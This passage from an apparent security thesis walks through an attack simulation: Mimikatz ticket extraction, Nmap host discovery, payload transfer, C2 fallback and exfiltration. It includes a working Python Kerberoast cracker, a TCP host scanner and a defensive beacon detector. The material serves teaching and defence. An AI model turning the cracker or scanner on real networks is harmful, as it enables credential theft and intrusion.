Step 3: Extract service tickets using Mimikatz

Mimikatz allows you to extract the local tickets and save them to disk. We need to do this so that we can pass them into our password-cracking script. To do this, install Mimikatz and issue a single command.

Step 4: Crack the tickets

With the tickets saved to disk, you can begin cracking the passwords. Cracking service accounts is a particularly effective approach because their passwords very rarely change. Also, cracking the tickets offline generates no domain traffic and causes no account lockouts, so this stage is invisible to the domain.
The Kerberoast toolkit provides a useful Python script for this. Some setup may be needed to get the environment the script requires. The script runs a dictionary of candidate passwords, converted to NTLM hashes, against the extracted service tickets until one of them successfully decrypts a ticket. When the ticket can be opened, the service account has been cracked and its plaintext password is revealed.
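To make Step 4 concrete, here is an added worked example in Python (not code from the thesis or from the Kerberoast toolkit) of the offline cracking it describes. Because no domain controller is available offline, the example first plays the role of the KDC and builds an RC4-HMAC (etype 23) service ticket for a made-up account (svc_sql in the hypothetical realm CORP.LOCAL, with a constructed password), writes it in the $krb5tgs$23$ line format that Kerberoast and Rubeus produce, and then cracks that line with a small constructed wordlist the way the toolkit's script does: each candidate password is turned into an NTLM hash and the ticket's checksum is verified under that key. The MD4 routine is included because hashlib's md4 is disabled on many current OpenSSL builds, and the confounder is fixed rather than random so the output is reproducible.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
TGS_REP_TICKET_USAGE = 2  # RFC 4120 key usage number for the ticket enc-part of a TGS-REP

def md4(message: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is disabled on many OpenSSL 3 builds."""
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(message) * 8
    message += b"\x80" + b"\x00" * ((55 - len(message)) % 64) + struct.pack("<Q", bit_len)
    for off in range(0, len(message), 64):
        x = struct.unpack("<16I", message[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F, message words in order
            a = rol((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,9,13,...
            a = rol((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3: H
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)

def ntlm_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC it is also the Kerberos long-term key."""
    return md4(password.encode("utf-16le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757: output = checksum || RC4(K3, confounder || plaintext). This is the KDC's side."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key, usage, edata):
    """Return the plaintext when the checksum verifies under this key, else None."""
    checksum, body = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), body)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), checksum) else None

def format_kerberoast(user, realm, spn, edata):
    """The $krb5tgs$23$ line Kerberoast/Rubeus emit for a ticket (hashcat mode 13100)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"

def crack_kerberoast(line, wordlist):
    """Step 4, offline: the first candidate whose NT hash verifies the ticket checksum wins."""
    checksum_hex, enc_hex = line.rsplit("$", 2)[1:]
    edata = bytes.fromhex(checksum_hex) + bytes.fromhex(enc_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(ntlm_hash(candidate), TGS_REP_TICKET_USAGE, edata) is not None:
            return candidate
    return None

# Constructed sample: account, realm, SPN, password and wordlist are all made up. We play the
# KDC ourselves; the confounder is fixed (a real KDC picks it at random) so the output is stable.
SERVICE_PASSWORD = "Summer2018!"
TICKET_PLAINTEXT = b"constructed EncTicketPart stand-in; a real ticket carries ASN.1 DER here"
SAMPLE_LINE = format_kerberoast(
    "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
    rc4_hmac_encrypt(ntlm_hash(SERVICE_PASSWORD), TGS_REP_TICKET_USAGE,
                     TICKET_PLAINTEXT, b"\x01\x02\x03\x04\x05\x06\x07\x08"))
WORDLIST = ["Password1", "Welcome1", "Summer2018!", "P@ssw0rd"]
```

Every attempt costs one MD4, three HMAC-MD5 calls and one RC4 pass, all computed locally against the saved ticket, which is why this stage produces no domain traffic or lockouts; the only thing that slows the attacker down is the length of the service account's password.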

Figure 4.16: Scanning the segment for live hosts

One of the very first steps in any network reconnaissance mission is to reduce a (sometimes huge) set of IP ranges into a list of active or interesting hosts. Scanning every port of every single IP address is slow and usually unnecessary. Of course, what makes a host interesting depends greatly on the purpose of the scan. Network administrators may only be interested in hosts running a certain service, while security auditors may care about every single device with an IP address. An administrator may be comfortable using just an ICMP ping to locate hosts on the internal network, while an external penetration tester may use a diverse set of dozens of probes in an attempt to evade firewall restrictions.

Because host discovery needs are so diverse, Nmap offers a wide variety of options for customising the techniques used. Host discovery is sometimes called ping scan, but it goes well beyond the simple ICMP echo request packets associated with the ubiquitous ping tool. Users can skip the ping step entirely with a list scan (-sL) or by disabling ping (-Pn), or engage the network with arbitrary combinations of multi-port TCP SYN/ACK, UDP, SCTP INIT and ICMP probes. The goal of these probes is to solicit responses which show that an IP address is actually active (in use by a host or network device). On many networks, only a small percentage of IP addresses are active at any given time. This is particularly common with private address space such as 10.0.0.0/8. That network has 16 million IPs, yet it is often used by organisations with fewer than a thousand machines. Host discovery can find those machines in a sparsely allocated sea of IP addresses.
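Both the Qualys discovery scan in Section 4.2.1 and the Nmap host discovery described above rest on the same observation: any response, including a TCP reset from a closed port, proves that an address is in use, whereas silence proves nothing. The following Python example, added here and not taken from the thesis, Qualys or Nmap, implements that logic with plain TCP connect probes (the fallback used when ICMP is filtered; raw ICMP would require root). It expands target ranges into candidate addresses, classifies each probe as open, closed or filtered, and reduces the candidate list to live hosts. The probe port set and the loopback listener are assumptions made so that the example runs offline.

```python
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Ports that are commonly reachable even through restrictive filtering; a RST from any of
# them is as good as an echo reply for proving the address is in use.
PROBE_PORTS = (80, 443, 22, 445, 3389)


def expand_targets(*ranges):
    """Turn CIDR ranges or single addresses into the flat candidate list a scan starts from."""
    hosts = []
    for r in ranges:
        net = ipaddress.ip_network(r, strict=False)
        # hosts() drops network/broadcast; /31 and /32 have no such addresses to drop
        hosts.extend(str(h) for h in (net.hosts() if net.num_addresses > 2 else net))
    return hosts


def tcp_probe(host, port, timeout=1.0):
    """'open' and 'closed' both prove a live host; 'filtered' (no answer) proves nothing."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:   # a RST came back, so something answered
        return "closed"
    except OSError:                  # timeout, no route, etc.
        return "filtered"


def host_is_alive(host, ports=PROBE_PORTS, timeout=1.0):
    """One answering port of any kind is enough; all-filtered means no evidence either way."""
    return any(tcp_probe(host, p, timeout) != "filtered" for p in ports)


def discover(hosts, ports=PROBE_PORTS, timeout=1.0, workers=64):
    """Reduce a candidate list to the hosts that answered at least one probe."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        alive = pool.map(lambda h: host_is_alive(h, ports, timeout), hosts)
        return [h for h, ok in zip(hosts, alive) if ok]


def _accept_loop(srv):
    while True:
        try:
            conn, _ = srv.accept()
            conn.close()
        except OSError:              # listener closed
            return


def local_listener():
    """Start a throwaway TCP listener on loopback so the demo has an 'open' port offline."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=_accept_loop, args=(srv,), daemon=True).start()
    return srv, srv.getsockname()[1]


def closed_local_port():
    """Bind then release a loopback port: connecting to it now yields a RST (closed)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv, open_port = local_listener()
    print("open port:", tcp_probe("127.0.0.1", open_port))
    print("closed port:", tcp_probe("127.0.0.1", closed_local_port()))
    print("live hosts:", discover(expand_targets("127.0.0.1"), ports=(open_port,)))
    srv.close()
```

Against a real range the call is simply discover(expand_targets("10.0.0.0/24")); note that a host whose every probed port is silently dropped is reported as not alive, which is exactly the blind spot the -Pn option in Nmap exists to work around.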

Figure 4.17: Transferring the payload to live hosts

Some typical examples of the ways in which malicious payloads cause damage:
Data theft: Particularly common is the theft of sensitive information, such as login credentials or financial data, through various forms of data breach.
Activity monitoring: An executed malicious payload may serve to monitor user activity on a computer; this can be done for spying, blackmail, or to aggregate consumer behaviour that can be sold to advertisers.
Displaying advertisements: Some malicious payloads display persistent, unwanted advertisements, such as pop-ups and pop-unders, to the victim.
Deleting or modifying files: This is one of the most serious consequences of a malicious payload. Files can be deleted or modified to change the behaviour of a computer, or even to disable the operating system or its startup processes. For example, some malicious payloads are designed to 'brick' mobile devices, meaning they can no longer be turned on or used in any way.
Downloading new files: Some malicious payloads come in lightweight files that are easy to distribute, but once executed they trigger the download of a much larger piece of malicious software.
Running background processes: A malicious payload can also be triggered to quietly run processes in the background, such as cryptocurrency mining or data storage.

Figure 4.18: Command and control with the users

As described in Section 3.7, command and control activity is the communication between the compromised client systems and the server systems under the attacker's control in the target network; the level of stealth that can be achieved depends on the network topology and system configuration, and the many options available at the network level are described by their most common factors.
In the simulation, the malicious file is transferred to all the live hosts in the network at regular intervals. If one command and control server is blocked, a secondary command and control server is used.

Figure 4.19: Transfer the malicious file to the users
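The commonly-used-port and uncommon-port techniques of Section 3.7, and the regular-interval transfers and fallback server described above, leave a recognisable pattern on the defender's side: the implant's connections to the C2 server recur at a near-constant interval, whatever port they use. The following Python example, added here and not part of the thesis, runs a beacon detector over a constructed connection log (timestamp, source, destination, destination port, protocol): it groups flows by source, destination and port, measures how regular the gaps between connections are, and separately lists flows to ports outside the common set. The log lines, addresses and thresholds are made up for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Ports an adversary favours for blending in (Section 3.7, technique 1); anything else is a
# candidate for technique 2. On its own the port is a weak signal in either direction.
COMMON_PORTS = {80, 443, 25, 53, 135, 22, 3389}
BASE = 1551434400  # constructed: 2019-03-01T10:00:00Z


def _line(offset, src, dst, dport):
    ts = datetime.fromtimestamp(BASE + offset, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{ts} {src} {dst} {dport} tcp"


# Constructed connection log (timestamp src dst dport proto); not data from the simulation.
SAMPLE_LOG = (
    [_line(o, "10.0.0.12", "203.0.113.10", 443)        # implant: ~300 s beacon, small jitter
     for o in (0, 302, 598, 901, 1199, 1503, 1798, 2102, 2399, 2700)]
    + [_line(o, "10.0.0.15", "198.51.100.20", 443)     # a user browsing: irregular gaps
       for o in (0, 45, 400, 410, 1900, 2000, 2600)]
    + [_line(o, "10.0.0.12", "198.51.100.7", 4444)     # fallback C2 on an uncommon port
       for o in (3000, 3310)]
)


def parse_log(lines):
    records = []
    for line in lines:
        ts, src, dst, dport, proto = line.split()
        epoch = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc).timestamp()
        records.append({"ts": epoch, "src": src, "dst": dst, "dport": int(dport), "proto": proto})
    return records


def find_beacons(lines, min_connections=6, max_jitter=0.2):
    """Flag (src, dst, dport) flows whose inter-connection gaps are suspiciously regular.
    Regularity is the coefficient of variation (stdev / mean) of the gaps; min_connections
    keeps two-packet flows (one gap, zero variance) from being reported as beacons."""
    flows = defaultdict(list)
    for rec in parse_log(lines):
        flows[(rec["src"], rec["dst"], rec["dport"])].append(rec["ts"])
    beacons = []
    for (src, dst, dport), times in flows.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_jitter:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "period_s": round(mean), "jitter": round(cv, 3),
                            "blends_in": dport in COMMON_PORTS})
    return beacons


def uncommon_port_flows(lines):
    """Technique 2 candidates: destinations contacted on ports outside the common set."""
    return sorted({(r["src"], r["dst"], r["dport"]) for r in parse_log(lines)
                   if r["dport"] not in COMMON_PORTS})


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print("beacon:", b)
    print("uncommon ports:", uncommon_port_flows(SAMPLE_LOG))
```

The beacon on TCP 443 is flagged even though it blends in with HTTPS, because the timing, not the port, gives it away; the fallback server on 4444 is caught by the port rule but has too few connections for the timing rule, which is why both checks are worth running together. Implants that add large random sleep jitter will push the coefficient of variation above the threshold, so the threshold is a tuning knob rather than a fixed truth.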

Figure 4.20: Exfiltrating the confidential data

Data, such as sensitive documents, may be exfiltrated through automated processing or scripting after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques are likely to apply as well to transfer the data out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol. Examples:
CosmicDuke, Honeybee, Rover, TINYTYPHON, USBStealer

4.3.1 Code

Figure 4.21: Command and control code


Chapter 5

Conclusions

5.1 Vulnerability management

Organisations of any size, and even individuals who face an increased risk of cyberattacks, can benefit from some form of vulnerability assessment, but large enterprises and other organisations that are subject to ongoing attacks will benefit most from vulnerability analysis. Vulnerability scanning helps the security professionals on the front lines to identify and fix vulnerabilities quickly and easily, including software flaws, missing patches, malware and misconfigurations, across a variety of operating systems, devices and applications.

5.1.1 Future Enhancement

Automating vulnerability management so that vulnerabilities are remediated quickly.

References

S. M. Furnell, A. Al-Ayed, The Research on a Patch Management System for Enterprise Vulnerability Update, 2009 WASE International Conference on Information Engineering.
Fanglu Guo, Yang Yu, Tzi-cker Chiueh, Automated and Safe Vulnerability Assessment, 21st Annual Computer Security Applications Conference (ACSAC'05), IEEE, 2005.
Alexandre Vernotte, Research Questions for Model-Based Vulnerability Testing of Web Applications, Software Testing, Verification and Validation (ICST), 2013 IEEE Sixth International Conference on, IEEE, 2013.
Nessus, Configuring Nessus to perform local security checks on Unix hosts, http://nessus.org/documentation/index.php?doc=ssh
Insha Altaf, Firdous ul Rashid, Jawad Ahmad Dar, Vulnerability Assessment and Patching Management, 2015 International Conference on Soft Computing Techniques and Implementations.
Sangeeta Nagpure, Sonal Kurkure, Vulnerability Assessment and Penetration Testing of Web Application, 2017 International Conference on Computing, Communication, Control and Automation (ICCUBEA).
Prashant S. Shinde, Shrikant B. Ardhapurkar, Cyber security analysis using vulnerability assessment and penetration testing, 2016 World Conference on Futuristic Trends in Research and Innovation for Social Welfare (Startup Conclave), 29 Feb.-1 March 2016.
OWASP Top 10 Vulnerabilities, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Hessa Mohammed Zaher AlShebl, 4 May 2018.
Bibliography

[1] Insha Altaf, Firdous ul Rashid, Jawad Ahmad Dar, Mohd. Rafiq. Vulnerability assessment and patching management. International Conference on Soft Computing Techniques and Implementations (ICSCTI), pages 16–21, Oct 2015. URL https://ieeexplore.ieee.org/document/7489631.

[2] S. M. Furnell, A. Al-Ayed, Duanyang Zhao. The research on a patch management system for enterprise vulnerability update. 2009 WASE International Conference on Information Engineering, 2(3):250–253, July 2009. URL https://ieeexplore.ieee.org/abstract/document/5211409.

[3] Fanglu Guo, Yang Yu, Tzi-cker Chiueh. Automated and safe vulnerability assessment. 21st Annual Computer Security Applications Conference (ACSAC'05), 10 pp., Dec 2005. URL https://ieeexplore.ieee.org/abstract/document/1565243.

[4] William Wu, Frederick Yip, Eunice Yiu, Pradeep Ray. Integrated vulnerability management system for enterprise networks. 2005 IEEE International Conference on e-Technology, e-Commerce and e-Service, pages 698–703, Mar 2005.

[5] Sangeeta Nagpure, Sonal Kurkure. Vulnerability assessment and penetration testing of web application. 2017 International Conference on Computing, Communication, Control and Automation (ICCUBEA), pages 1–6, Aug 2017. URL https://ieeexplore.ieee.org/abstract/document/8463920.
